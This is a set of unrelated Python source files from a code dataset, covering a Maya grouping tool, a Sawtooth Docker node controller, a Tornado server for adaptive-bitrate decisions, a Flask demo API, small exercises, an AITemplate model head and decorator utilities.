self.text_groupCount.text()\n        try:\n            if int(groupCount)>=1:\n                return int(groupCount)\n        except:\n            ld.msg('Please input an integer!')\n            return 0\n    def depthGroupR(self):\n        cmds.undoInfo(ock = 1)\n        sel = cmds.ls(sl=1,fl=1)\n        groupCount = 
self.getGroupCount()\n        groups = []\n        start = 0\n        currentCount = len(sel)\n        stop = int(currentCount/groupCount) if groupCount else 0\n        if groupCount == 0:\n            return\n        else: \n            sel = self.shuffleByDepth(sel)\n            group_objs = []\n            currentGroupCount = groupCount\n            for i in range(groupCount):\n                group_objs = sel[start:stop]\n                tempGroup = cmds.group(group_objs,n='randomGroup#')\n                groups.append(tempGroup)\n                currentCount = currentCount-(stop-start)\n                start = stop\n                currentGroupCount = currentGroupCount-1\n                if currentGroupCount == 0:\n                    break\n                else:\n                    stop = stop + int(currentCount/currentGroupCount)\n\n            mainGroup = cmds.group(groups,n='randomMainGroup#')\n            childGroups = cmds.listRelatives(mainGroup)\n            \n            for level1 in range(len(childGroups)):\n                children = cmds.listRelatives(childGroups[level1])\n                for level2 in range(len(childGroups)):\n                    jumpHardness = abs(level1-level2)\n                    randomBar = 0.5**(jumpHardness+1)\n                    if jumpHardness == 0:\n                        continue\n                    else:\n                        for child in children:\n                            if random.random() < randomBar:\n                                cmds.parent(child,childGroups[level2])\n            cmds.select(mainGroup,r=1)\n        cmds.undoInfo(cck = 1)\n\n    def depthGroupA(self):\n        cmds.undoInfo(ock = 1)\n        sel = cmds.ls(sl=1,fl=1)\n        groupCount = self.getGroupCount()\n        groups = []\n        start = 0\n        currentCount = len(sel)\n        stop = int(currentCount/groupCount) if groupCount else 0\n        if groupCount == 0:\n            return\n        else:\n            sel = self.shuffleByDepth(sel)\n            group_objs = []\n            currentGroupCount = groupCount\n            for i in range(groupCount):\n                group_objs = sel[start:stop]\n                tempGroup = cmds.group(group_objs,n='randomGroup#')\n                groups.append(tempGroup)\n                currentCount = currentCount-(stop-start)\n                start = stop\n                currentGroupCount = currentGroupCount-1\n                if currentGroupCount == 0:\n                    break\n                else:\n                    stop = stop + int(currentCount/currentGroupCount)\n            mainGroup = cmds.group(groups,n='randomMainGroup#')\n        cmds.undoInfo(cck = 1)\n    def randomGroup(self):\n        cmds.undoInfo(ock = 1)\n        sel = cmds.ls(sl=1,fl=1)\n        groupCount = self.getGroupCount()\n        groups = []\n        start = 0\n        currentCount = len(sel)\n        stop = int(currentCount/groupCount) if groupCount else 0\n        if groupCount == 0:\n            return\n        else:\n            random.shuffle(sel)\n            group_objs = []\n            currentGroupCount = groupCount\n            for i in range(groupCount):\n                group_objs = sel[start:stop]\n                tempGroup = cmds.group(group_objs,n='randomGroup#')\n                groups.append(tempGroup)\n                currentCount = currentCount-(stop-start)\n                start = stop\n                currentGroupCount = currentGroupCount-1\n                if currentGroupCount == 0:\n                    break\n                else:\n                    stop = stop + int(currentCount/currentGroupCount) \n            mainGroup = cmds.group(groups,n='randomMainGroup#')\n        cmds.undoInfo(cck = 1)\n\n    def shuffleByDepth(self, sel):\n        sel_depth = {}\n        for i in sel:\n            bb = cmds.polyEvaluate(i,b=1)\n            sel_depth[i] = bb[2][1]\n\n        # items() works on both Python 2 and 3 (iteritems is Python 2 only)\n        sel_depth_sorted = sorted(sel_depth.items(), key=lambda d:d[1])\n        newSel = []\n        for i in sel_depth_sorted:\n            newSel.append(i[0])\n        return newSel\n\n    def installStartBar(self):\n        allQWidgets = self.findChildren(QWidget)\n        for i in allQWidgets:\n            i.installEventFilter(self)\n\n    def eventFilter(self, obj, event ):\n        '''Connect signals on mouse over''' \n        if event.type() == QEvent.Enter:\n            self.oldMessage = ld.tag()\n            self.statusbar.showMessage(' '+obj.statusTip(),0) \n        elif event.type() == QEvent.Leave:\n            self.statusbar.showMessage(' '+self.oldMessage, 0)\n            pass \n        event.accept()\n        return False \n\n    def closeEvent(self,event):\n        ld.turnToolBtnOff(self,ldmt_button_name)\n        cmds.deleteUI(ldmt_window_name)\n\ndef ldmt_show():\n    if cmds.window(ldmt_window_name,ex=1):\n        if cmds.window(ldmt_window_name,q=1,vis=1):\n            
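# the window already exists and is visible, so hide it (toggling the tool off)\n            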
cmds.window(ldmt_window_name,e=1,vis=0)\n else:\n cmds.window(ldmt_window_name,e=1,vis=1)\n else:\n ui = ldmt_cls()\n ui.show()\n\nif __name__ == '__main__':\n ldmt_show()","repo_name":"liyihuiaacc/LD_MayaToolbox2","sub_path":"ldmt_function/ldmt_customGrouper.py","file_name":"ldmt_customGrouper.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35152797577","text":"import logging\nimport os\nimport subprocess\nimport tempfile\nimport yaml\n\nfrom sawtooth.cli.exceptions import CliException\n\nfrom sawtooth.manage.node import NodeController\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass _StateEntry(object):\n def __init__(self, name, identifier, status, command):\n self.name = name\n self.identifier = identifier\n self.status = status\n self.command = command\n\n\nclass DockerNodeController(NodeController):\n\n def __init__(self, state_dir=None):\n \"\"\"\n :param state_dir (str): optionally path to state directory\n \"\"\"\n if state_dir is None:\n state_dir = os.path.join(os.path.expanduser(\"~\"),\n '.sawtooth', 'cluster')\n\n if not os.path.exists(state_dir):\n os.makedirs(state_dir)\n\n self._state_dir = state_dir\n\n self._prefix = 'sawtooth-cluster-0'\n\n def _construct_start_args(self, node_name):\n try:\n network_ls_args = ['docker', 'network', 'ls', '--filter',\n 'NAME={}'.format(self._prefix), '-q']\n network_output = subprocess.check_output(\n network_ls_args).splitlines()\n except subprocess.CalledProcessError as e:\n raise CliException(str(e))\n\n if len(network_output) == 0:\n try:\n network_args = ['docker', 'network', 'create', '-d',\n 'bridge', self._prefix]\n n_output = subprocess.check_output(network_args)\n for l in n_output.splitlines():\n LOGGER.info(l)\n except subprocess.CalledProcessError as e:\n raise CliException(str(e))\n args = ['docker-compose', '-p',\n self._prefix.replace('-', '') + node_name,\n 'up', '-d']\n\n return args\n\n def _join_args(self, args):\n formatted_args = []\n for arg in args:\n if ' ' in arg:\n formatted_args.append(\"'\" + arg + \"'\")\n else:\n formatted_args.append(arg)\n return ' '.join(formatted_args)\n\n def start(self, node_config):\n node_name = node_config.node_name\n http_port = node_config.http_port\n\n args = self._construct_start_args(node_name)\n LOGGER.debug('starting %s: %s', node_name, self._join_args(args))\n\n compose_dir = tempfile.mkdtemp()\n compose_dict = {\n 'version': '2',\n 'services': {\n 'validator': {\n 'image': 'sawtooth-validator',\n 'expose': ['40000'],\n 'networks': [self._prefix, 'default'],\n 'volumes': ['/project:/project'],\n 'container_name': self._prefix + '-' + node_name\n }\n },\n 'networks': {self._prefix: {'external': True}}\n }\n\n state_file_path = os.path.join(self._state_dir, 'state.yaml')\n state = yaml.load(file(state_file_path))\n\n # add the processors\n node_num = node_name[len('validator-'):]\n for proc in state['Processors']:\n compose_dict['services'][proc] = {\n 'image': proc,\n 'expose': ['40000'],\n 'links': ['validator'],\n 'volumes': ['/project:/project'],\n 'container_name': '-'.join([self._prefix, proc, node_num])\n }\n\n # add the host:container port mapping for validator\n http_port = http_port + 31200\n compose_dict['services']['validator']['ports'] = \\\n [str(http_port) + \":\" + str(40000)]\n\n yaml.dump(compose_dict,\n file(os.path.join(compose_dir, 'docker-compose.yaml'),\n mode='w'))\n try:\n os.chdir(compose_dir)\n output = subprocess.check_output(args)\n except 
subprocess.CalledProcessError as e:\n processors = state['Processors']\n # check if the docker image is built\n unbuilt = self._get_unbuilt_images(processors)\n if unbuilt:\n raise CliException(\n 'Docker images not built: {}. Try running '\n '\"sawtooth docker build {}\"'.format(\n ', '.join(unbuilt), ' '.join(unbuilt)))\n\n invalid = self._check_invalid_processors(processors)\n if invalid:\n raise CliException(\n 'No such processor: {}'.format(', '.join(invalid)))\n\n raise CliException(str(e))\n\n except OSError as e:\n if e.errno == 2:\n raise CliException(\"{}:{}\".format(str(e), args[0]))\n else:\n raise e\n\n for line in output.split('\\n'):\n if len(line) < 1:\n continue\n LOGGER.debug(\"command output: %s\", str(line))\n\n def _get_unbuilt_images(self, processors):\n processors += ['sawtooth-validator']\n built_ins = self._built_in_processor_types()\n built_images = self._get_built_images()\n\n unbuilt = [image for image in processors\n if image not in built_images and image in built_ins]\n\n return unbuilt\n\n def _check_invalid_processors(self, processors):\n built_ins = self._built_in_processor_types()\n built_images = self._get_built_images()\n\n invalid = [image for image in processors\n if image not in built_images and image not in built_ins]\n\n return invalid\n\n def _get_built_images(self):\n docker_img_cmd = ['docker', 'images', '--format', '{{.Repository}}']\n return subprocess.check_output(docker_img_cmd).split('\\n')\n\n def _built_in_processor_types(self):\n image_data_dir = os.path.join(os.path.dirname(__file__),\n os.path.pardir,\n 'cli', 'data')\n return os.listdir(image_data_dir)\n\n def stop(self, node_name):\n state_file_path = os.path.join(self._state_dir, 'state.yaml')\n state = yaml.load(file(state_file_path))\n\n node_num = node_name[len('validator-'):]\n\n processes = state['Processors'] + ['validator']\n\n containers = ['-'.join([self._prefix, proc, node_num])\n for proc in processes]\n\n for c_name in containers:\n args = ['docker', 'stop', c_name]\n LOGGER.debug('stopping %s: %s', c_name, ' '.join(args))\n\n try:\n output = subprocess.check_output(args)\n except subprocess.CalledProcessError as e:\n raise CliException(str(e))\n\n for line in output.split('\\n'):\n if len(line) < 1:\n continue\n LOGGER.debug(\"command output: %s\", str(line))\n\n args = ['docker', 'rm', c_name]\n LOGGER.debug('stopping %s: %s', c_name, ' '.join(args))\n\n try:\n output = subprocess.check_output(args)\n except subprocess.CalledProcessError as e:\n raise CliException(str(e))\n\n for line in output.split('\\n'):\n if len(line) < 1:\n continue\n LOGGER.debug(\"command output: %s\", str(line))\n if 'validator' in c_name:\n network = c_name.replace('-', '') + '_default'\n args = ['docker', 'network', 'rm', network]\n try:\n output = subprocess.check_output(args)\n except subprocess.CalledProcessError as e:\n raise CliException(str(e))\n\n for line in output.splitlines():\n if len(line) < 1:\n continue\n LOGGER.debug(\"command output: %s\", str(line))\n\n def create_genesis_block(self, node_args):\n pass\n\n def kill(self, node_name):\n self.stop(node_name)\n\n def _get_state(self):\n args = [\n 'docker',\n 'ps',\n '-a',\n '--no-trunc',\n '--format',\n '{{.Names}},{{.ID}},{{.Status}},'\n '{{.Command}}',\n '--filter',\n 'network={}'.format(self._prefix)]\n\n try:\n output = subprocess.check_output(args)\n except subprocess.CalledProcessError as e:\n raise CliException(str(e))\n except OSError as e:\n if e.errno == 2:\n raise CliException(\"{}:{}\".format(str(e),\n args[0]))\n\n 
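# each line of docker ps output follows the --format template above,\n        # i.e. a comma-separated record: name,id,status,command\n        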
entries = []\n for line in output.split('\\n'):\n if len(line) < 1:\n continue\n parts = line.split(',')\n entries.append(_StateEntry(\n name=parts[0].replace(self._prefix + '-', ''),\n identifier=parts[1],\n status=parts[2],\n command=parts[3]))\n\n return entries\n\n def get_node_names(self):\n node_names = []\n for entry in self._get_state():\n node_names.append(entry.name)\n return node_names\n\n def is_running(self, node_name):\n for entry in self._get_state():\n if node_name == entry.name:\n return entry.status.startswith(\"Up\")\n return False\n","repo_name":"vdt/sawtooth-core","sub_path":"core/sawtooth/manage/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":9320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"27201332392","text":"import tornado.ioloop\nimport tornado.web\nimport tornado.httpserver\nimport tornado.process\nimport tornado.netutil\nfrom concurrent.futures import ThreadPoolExecutor\nimport json\nimport argparse\nimport numpy as np\nimport time\nimport socket\n\nimport robustmpc\nimport pensieve\nimport hotdash\n\n\nIP_PORT = 9999\n\nS_INFO_R = 5\nS_LEN = 8\nS_ABR_INFO = 6\nS_HOT_INFO = 6\nS_BRT_INFO = 2\nS_INFO_H = S_ABR_INFO + S_HOT_INFO + S_BRT_INFO\nS_INFO_PENSIEVE = 6\nA_DIM = 6\nA_DIM_prefetch = 2\nS_INFO_bitr = 6\nS_INFO_P = 6\n\nMPC_FUTURE_CHUNK_COUNT = 5\nACTOR_LR_RATE = 0.0001\nCRITIC_LR_RATE = 0.001\nVIDEO_BIT_RATE = [300, 750, 1200, 1850, 2850, 4300] # Kbps\nBITRATE_REWARD = [1, 2, 3, 12, 15, 20]\nBUFFER_NORM_FACTOR = 10.0\nCHUNK_TIL_VIDEO_END_CAP = 48.0\nTOTAL_VIDEO_CHUNKS = 48\nM_IN_K = 1000.0\nREBUF_PENALTY = 4.3 # 1 sec rebuffering -> 3 Mbps\nSMOOTH_PENALTY = 1\nDEFAULT_QUALITY = 1 # default video quality without agent\nRANDOM_SEED = 42\nTRAIN_SEQ_LEN = 100 # take as a train batch\nMODEL_SAVE_INTERVAL = 100\nENTROPY_CHANGE_INTERVAL = 20000\nHD_REWARD = [1, 2, 3, 12, 15, 20]\nNUM_HOTSPOT_CHUNKS = 5\nBITRATE_LEVELS = 6\nDEFAULT_PREFETCH = 0 # default prefetch decision without agent\nRAND_RANGE = 1000\n\n\nclass MainHandler(tornado.web.RequestHandler):\n executor = ThreadPoolExecutor(20)\n\n def initialize(self, args, teacher):\n self.teacher = teacher\n self.args = args\n\n def post(self):\n t1 = time.time()\n env_post_data = json.loads(self.request.body)\n last_bit_rate = env_post_data['last_bit_rate']\n buffer_size = env_post_data['buffer_size']\n rebuf = env_post_data['rebuf']\n video_chunk_size = env_post_data['video_chunk_size']\n delay = env_post_data['delay']\n video_chunk_remain = env_post_data['video_chunk_remain']\n next_video_chunk_sizes = env_post_data['next_video_chunk_sizes']\n\n if self.args.abr == 'pensieve':\n state = np.zeros((S_INFO_P, S_LEN))\n state[0, -1] = VIDEO_BIT_RATE[last_bit_rate] / float(np.max(VIDEO_BIT_RATE)) # last quality\n state[1, -1] = buffer_size / BUFFER_NORM_FACTOR # 10 sec\n state[2, -1] = float(video_chunk_size) / float(delay) / M_IN_K # kilo byte / ms\n state[3, -1] = float(delay) / M_IN_K / BUFFER_NORM_FACTOR # 10 sec\n state[4, :A_DIM] = np.array(next_video_chunk_sizes) / M_IN_K / M_IN_K # mega byte\n state[5, -1] = np.minimum(video_chunk_remain, CHUNK_TIL_VIDEO_END_CAP) / float(CHUNK_TIL_VIDEO_END_CAP)\n\n bit_rate = int(self.teacher.predict(state))\n\n elif self.args.abr == 'robustmpc':\n state = np.zeros((S_INFO_R, S_LEN))\n state[0, -1] = VIDEO_BIT_RATE[last_bit_rate] / float(np.max(VIDEO_BIT_RATE)) # last quality\n state[1, -1] = buffer_size / BUFFER_NORM_FACTOR\n state[2, -1] = rebuf\n state[3, -1] = float(video_chunk_size) / 
float(delay) / M_IN_K # kilo byte / ms\n state[4, -1] = np.minimum(video_chunk_remain, CHUNK_TIL_VIDEO_END_CAP) / float(CHUNK_TIL_VIDEO_END_CAP)\n\n bit_rate = int(self.teacher.predict(state))\n\n elif self.args.abr == 'hotdash':\n hotspot_chunks_remain = env_post_data['hotspot_chunks_remain']\n last_hotspot_bit_rate = env_post_data['last_hotspot_bit_rate']\n next_hotspot_chunk_sizes = env_post_data['next_hotspot_chunk_sizes']\n dist_from_hotspot_chunks = env_post_data['dist_from_hotspot_chunks']\n\n state = np.zeros((S_INFO_H, S_LEN))\n state[0, -1] = VIDEO_BIT_RATE[last_bit_rate] / float(np.max(VIDEO_BIT_RATE)) # last quality\n state[1, -1] = buffer_size / BUFFER_NORM_FACTOR # 10 sec\n state[2, -1] = float(video_chunk_size) / float(delay) / M_IN_K # kilo byte / ms\n state[3, -1] = float(delay) / M_IN_K / BUFFER_NORM_FACTOR # 10 sec\n state[4, :BITRATE_LEVELS] = np.array(next_video_chunk_sizes) / M_IN_K / M_IN_K # mega byte\n state[5, -1] = np.minimum(video_chunk_remain, CHUNK_TIL_VIDEO_END_CAP) / CHUNK_TIL_VIDEO_END_CAP\n state[6, -1] = np.minimum(hotspot_chunks_remain, NUM_HOTSPOT_CHUNKS) / float(NUM_HOTSPOT_CHUNKS)\n state[7, -1] = np.minimum(video_chunk_remain, CHUNK_TIL_VIDEO_END_CAP) / CHUNK_TIL_VIDEO_END_CAP\n state[8, -1] = buffer_size / BUFFER_NORM_FACTOR\n state[9, -1] = last_hotspot_bit_rate / float(np.max(VIDEO_BIT_RATE))\n state[10, :BITRATE_LEVELS] = np.array(next_hotspot_chunk_sizes) / M_IN_K / M_IN_K\n state[11, :NUM_HOTSPOT_CHUNKS] = (np.array(\n dist_from_hotspot_chunks) + CHUNK_TIL_VIDEO_END_CAP) / 2 / CHUNK_TIL_VIDEO_END_CAP\n state[12, -1] = last_bit_rate / float(np.max(VIDEO_BIT_RATE))\n state[13, -1] = last_hotspot_bit_rate / float(np.max(VIDEO_BIT_RATE))\n\n state_info_pensieve_n = np.zeros((S_INFO_PENSIEVE, S_LEN))\n state_info_pensieve_n[0, -1] = VIDEO_BIT_RATE[last_bit_rate] / float(np.max(VIDEO_BIT_RATE))\n state_info_pensieve_n[1, -1] = buffer_size / BUFFER_NORM_FACTOR\n state_info_pensieve_n[2, -1] = float(video_chunk_size) / float(delay) / M_IN_K\n state_info_pensieve_n[3, -1] = float(delay) / M_IN_K / BUFFER_NORM_FACTOR\n state_info_pensieve_n[4, :BITRATE_LEVELS] = np.array(next_video_chunk_sizes) / M_IN_K / M_IN_K\n state_info_pensieve_n[5, -1] = np.minimum(video_chunk_remain,\n CHUNK_TIL_VIDEO_END_CAP) / CHUNK_TIL_VIDEO_END_CAP\n\n state_info_pensieve_h = np.zeros((S_INFO_PENSIEVE, S_LEN))\n state_info_pensieve_h[0, -1] = VIDEO_BIT_RATE[last_bit_rate] / float(np.max(VIDEO_BIT_RATE))\n state_info_pensieve_h[1, -1] = buffer_size / BUFFER_NORM_FACTOR # 10 sec\n state_info_pensieve_h[2, -1] = float(video_chunk_size) / float(delay) / M_IN_K\n state_info_pensieve_h[3, -1] = float(delay) / M_IN_K / BUFFER_NORM_FACTOR # 10 sec\n state_info_pensieve_h[4, :BITRATE_LEVELS] = np.array(next_hotspot_chunk_sizes) / M_IN_K / M_IN_K\n state_info_pensieve_h[5, -1] = np.minimum(video_chunk_remain,\n CHUNK_TIL_VIDEO_END_CAP) / CHUNK_TIL_VIDEO_END_CAP\n\n states_list = np.array([state, state_info_pensieve_n, state_info_pensieve_h])\n bit_rate = int(self.teacher.predict(states_list)[1])\n\n else:\n raise NotImplementedError\n\n send_data = json.dumps({\"bitrate\": bit_rate})\n self.set_status(200)\n self.set_header('Content-Type', 'text/plain')\n self.set_header('Content-Length', len(send_data))\n self.set_header('Access-Control-Allow-Origin', \"*\")\n self.write(bytes(send_data, encoding='utf-8'))\n t2 = time.time()\n print(t2 - t1)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-a', '--abr', metavar='ABR', choices=['pensieve', 
'robustmpc', 'hotdash'])\n    parser.add_argument('-w', '--worker', type=int, default=1)\n    args = parser.parse_args()\n\n    sockets = tornado.netutil.bind_sockets(IP_PORT)\n    tornado.process.fork_processes(args.worker)\n    if args.abr == 'pensieve':\n        teacher = pensieve.Pensieve()\n    elif args.abr == 'robustmpc':\n        teacher = robustmpc.RobustMPC()\n    elif args.abr == 'hotdash':\n        teacher = hotdash.Hotdash()\n    else:\n        raise NotImplementedError\n    application = tornado.web.Application(handlers=[(r\"/\", MainHandler, dict(args=args, teacher=teacher))],\n                                          autoreload=False, debug=False)\n    http_server = tornado.httpserver.HTTPServer(application)\n    http_server.add_sockets(sockets)\n\n    tornado.ioloop.IOLoop.current().start()\n","repo_name":"transys-project/pitree","sub_path":"server_tornado.py","file_name":"server_tornado.py","file_ext":"py","file_size_in_byte":7794,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"53"} +{"seq_id":"26386106476","text":"from flask import Flask,jsonify\nfrom flask.globals import request\n\napp=Flask(__name__)\n\n@app.route('/')\ndef Hello_world():\n    return \"Hello World\"\n\n@app.route('/add',methods=['POST'])\ndef add():\n    request_json=request.get_json()\n    if \"x\" not in request_json or \"y\" not in request_json:\n        return {\"status\":False,\"message\":\"variables missing in request\"},400\n    return {\n        \"status\":True,\n        \"data\":request_json['x']+request_json['y']\n    },200\n\n@app.route('/json')\ndef json():\n    c={\n        \"hello\":\"There\"\n    }\n    return c\n\nif __name__==\"__main__\":\n    app.run(debug=True)","repo_name":"namansukhwani/FlaskAndDockerTraining","sub_path":"w1_w5APIS/extra_files/app_test1.py","file_name":"app_test1.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20149093934","text":"import heapq\n\ndef night_work(a, b):\n    if a >= sum(b):\n        return 0\n    \n    b = [-i for i in b]\n    heapq.heapify(b)\n\n    for i in range(a):\n        i = heapq.heappop(b)\n        i += 1\n        heapq.heappush(b, i)\n    \n    result_1 = []\n    for i in range(len(b)):\n        result_1.append(-b[i])\n\n    result_2 = sum([i ** 2 for i in b])\n\n    return result_1, result_2\n\nif __name__ == '__main__':\n    a = int(input('enter remaining work times >>'))\n    b = list(map(int, input('enter work load >>').split()))\n    result_1, result_2 = night_work(a, b)\n    print(result_1)\n    print(result_2)\n","repo_name":"jason2133/data_structure_and_algorithm","sub_path":"Assignment_3/assignment_3_3.py","file_name":"assignment_3_3.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1696261476","text":"bill = int(input(\"Please enter total bill amount: \"))\nlevel = input(\"Level of service: \")\n\nif level == \"good\":\n    tip = (int(bill) * .2)\n\nelif level == \"fair\":\n    tip = (int(bill) * .15)\n\nelif level == \"bad\":\n    tip = (int(bill) * .1)\n\nelse:\n    print(\"error\")\n    raise SystemExit\n\nprint(\"Tip amount: $\" + '%.2f' % float(tip))\nprint(\"Total amount: $ \" + '%.2f' % float(bill + tip))","repo_name":"zach-a-g/python1","sub_path":"python/tip_calculator.py","file_name":"tip_calculator.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
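The night_work record above (assignment_3_3.py) applies a classic idiom: Python's heapq is a min-heap, so pushing negated values turns it into a max-heap. A standalone sketch of that trick with made-up numbers; reduce_largest is a hypothetical helper name, not from the record:

import heapq

def reduce_largest(workloads, times):
    heap = [-w for w in workloads]            # negate so heappop yields the current maximum
    heapq.heapify(heap)
    for _ in range(times):
        largest = -heapq.heappop(heap)        # largest remaining workload
        heapq.heappush(heap, -(largest - 1))  # work one unit off it, push it back
    return sorted(-v for v in heap)

print(reduce_largest([4, 3, 3], 4))           # -> [2, 2, 2]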
+{"seq_id":"19818748440","text":"from typing import Callable\n\nfrom aitemplate.compiler import ops\n\nfrom aitemplate.frontend import Tensor\nfrom aitemplate.frontend.nn.dropout import Dropout\nfrom aitemplate.frontend.nn.linear import Linear\nfrom aitemplate.frontend.nn.module import Module\nfrom aitemplate.frontend.nn.softmax import Softmax\n\n\nclass SequencePool(Module):\n    \"\"\"\n    Sequence pool produces a single embedding from a sequence of embeddings. Currently\n    only \"mean\" is implemented; \"cls\" is planned (see the TODO in forward).\n\n    \"\"\"\n\n    def __init__(self, mode: str) -> None:\n        \"\"\"\n        Args:\n            mode (str): Options include \"cls\" and \"mean\". If set to \"cls\", it assumes\n                the first element in the input is the cls token and returns it. If set\n                to \"mean\", it returns the mean of the entire sequence. Only \"mean\" is\n                currently accepted.\n        \"\"\"\n        super().__init__()\n        assert mode in [\"mean\"], \"Unsupported mode for SequencePool.\"\n        self.mode = mode\n\n    def forward(self, x: Tensor) -> Tensor:\n        # TODO: Add support for cls mode.\n        # if self.mode == \"cls\":\n        #     x = x[:, 0]\n        if self.mode == \"mean\":\n            x = ops.reduce_mean(1)(x)\n        else:\n            raise NotImplementedError\n        return x\n\n\nclass VisionTransformerBasicHead(Module):\n    \"\"\"\n    Vision transformer basic head.\n\n    ::\n\n                                      SequencePool\n                                           ↓\n                                        Dropout\n                                           ↓\n                                       Projection\n                                           ↓\n                                       Activation\n\n\n    The builder can be found in `create_vit_basic_head`.\n    \"\"\"\n\n    def __init__(\n        self,\n        sequence_pool: Module = None,\n        dropout: Module = None,\n        proj: Module = None,\n        activation: Module = None,\n    ) -> None:\n        \"\"\"\n        Args:\n            sequence_pool (torch.nn.modules): pooling module.\n            dropout(torch.nn.modules): dropout module.\n            proj (torch.nn.modules): project module.\n            activation (torch.nn.modules): activation module.\n        \"\"\"\n        super().__init__()\n        self.sequence_pool = sequence_pool\n        self.dropout = dropout\n        self.proj = proj\n        self.activation = activation\n\n    def forward(self, x: Tensor) -> Tensor:\n        # Performs pooling.\n        if self.sequence_pool is not None:\n            x = self.sequence_pool(x)\n\n        # Performs dropout.\n        if self.dropout is not None:\n            x = self.dropout(x)\n        # Performs projection.\n        if self.proj is not None:\n            x = self.proj(x)\n        # Performs activation.\n        if self.activation is not None:\n            x = self.activation(x)\n        return x\n\n\ndef create_vit_basic_head(\n    *,\n    # Projection configs.\n    in_features: int,\n    out_features: int,\n    # Pooling configs.\n    seq_pool_type: str = \"cls\",\n    # Dropout configs.\n    dropout_rate: float = 0.5,\n    # Activation configs.\n    activation: Callable = None,\n) -> Module:\n    \"\"\"\n    Creates vision transformer basic head.\n\n    ::\n\n\n                                        Pooling\n                                           ↓\n                                        Dropout\n                                           ↓\n                                       Projection\n                                           ↓\n                                       Activation\n\n\n    Activation examples include: ReLU, Softmax, Sigmoid, and None.\n    Pool type examples include: cls, mean and none.\n\n    Args:\n\n        in_features: input channel size of the resnet head.\n        out_features: output channel size of the resnet head.\n\n        pool_type (str): Pooling type. It supports \"cls\", \"mean\" and \"none\". If set to\n            \"cls\", it assumes the first element in the input is the cls token and\n            returns it. 
If set to \"mean\", it returns the mean of the entire sequence.\n\n        activation (callable): a callable that constructs vision transformer head\n            activation layer, examples include: nn.ReLU, nn.Softmax, nn.Sigmoid, and\n            None (not applying activation).\n\n        dropout_rate (float): dropout rate.\n    \"\"\"\n    assert seq_pool_type in [\"cls\", \"mean\", \"none\"]\n\n    if seq_pool_type in [\"cls\", \"mean\"]:\n        seq_pool_model = SequencePool(seq_pool_type)\n    elif seq_pool_type == \"none\":\n        seq_pool_model = None\n    else:\n        raise NotImplementedError\n\n    if activation is None:\n        activation_model = None\n    elif activation == Softmax:\n        activation_model = activation(dim=1)\n    else:\n        activation_model = activation()\n\n    return VisionTransformerBasicHead(\n        sequence_pool=seq_pool_model,\n        dropout=Dropout(dropout_rate) if dropout_rate > 0.0 else None,\n        proj=Linear(in_features, out_features),\n        activation=activation_model,\n    )\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/frontend/nn/head.py","file_name":"head.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"21163135122","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nimport functools\nimport os\nimport re\nimport json\nimport wrapt\nimport time\n# from message_queue.tasks import new_template_task\n# from types import GeneratorType\n# from items.base_item import BaseItem\n# from templates.template import Template\n\n\ndef retry(retry_count=0, logger=None):\n    \"\"\"\n    Decorator that retries a function a given number of times.\n    :param retry_count: number of attempts\n    :param logger: logger\n    :return: decorated function\n    \"\"\"\n    def decorator(func):\n        @functools.wraps(func)\n        def wrapper(*args, **kwargs):\n            count = 0\n            while count < retry_count:\n                try:\n                    res = func(*args, **kwargs)\n                    return res\n                except Exception as e:\n                    count += 1\n        return wrapper\n    return decorator\n\n\ndef callback(callback=None):\n    @wrapt.decorator\n    def wrapper(wrapped, instance, args, kwargs):\n        try:\n            resp = wrapped(*args, **kwargs)\n            if callback:\n                callback(resp)\n        except Exception as e:\n            raise e\n    return wrapper\n\n\ndef check_path(path):\n    def decorator(func):\n        @functools.wraps(func)\n        def wrapper():\n            if os.path.exists(path):\n                func(path)\n            else:\n                raise FileNotFoundError(\"File not found.\")\n        return wrapper\n    return decorator\n\n\ndef singleton(cls, *args, **kw):\n    instances = {}\n\n    def _singleton():\n        if cls not in instances:\n            instances[cls] = cls(*args, **kw)\n        return instances[cls]\n    return _singleton\n\n\ndef item_format(file):\n    @wrapt.decorator\n    def wrapper(wrapped, instance, args, kwargs):\n        try:\n            with open(file, mode='r', encoding='utf-8') as f:\n                d = []\n                for line in f.readlines():\n                    k, v = line.split('=')\n                    d.append({k: v.replace('\\n', '')})\n                wrapped(d)\n        except Exception as e:\n            raise e\n\n    return wrapper\n\n\n# def put_request(*args, **kwargs):\n#     def decorator(func):\n#         @functools.wraps(func)\n#         def wrapper(*kargs, **kkwargs):\n#             kargs = args\n#             kkwargs = kwargs\n#             try:\n#                 return func(*kargs, **kkwargs)\n#             except Exception as e:\n#                 logger.error(e)\n#         return wrapper\n#     return decorator\n\n\n# def put_task(func):\n#     @functools.wraps(func)\n#     def wrapper(*args, **kwargs):\n#         try:\n#             result = func(*args, **kwargs)\n#             if isinstance(result, Template):\n#                 new_template_task(result)\n#             elif isinstance(result, list) or isinstance(result, GeneratorType):\n#                 for res in result:\n#                     new_template_task(res)\n#         except Exception as e:\n#             logger.error(e)\n#     return wrapper\n\n\n
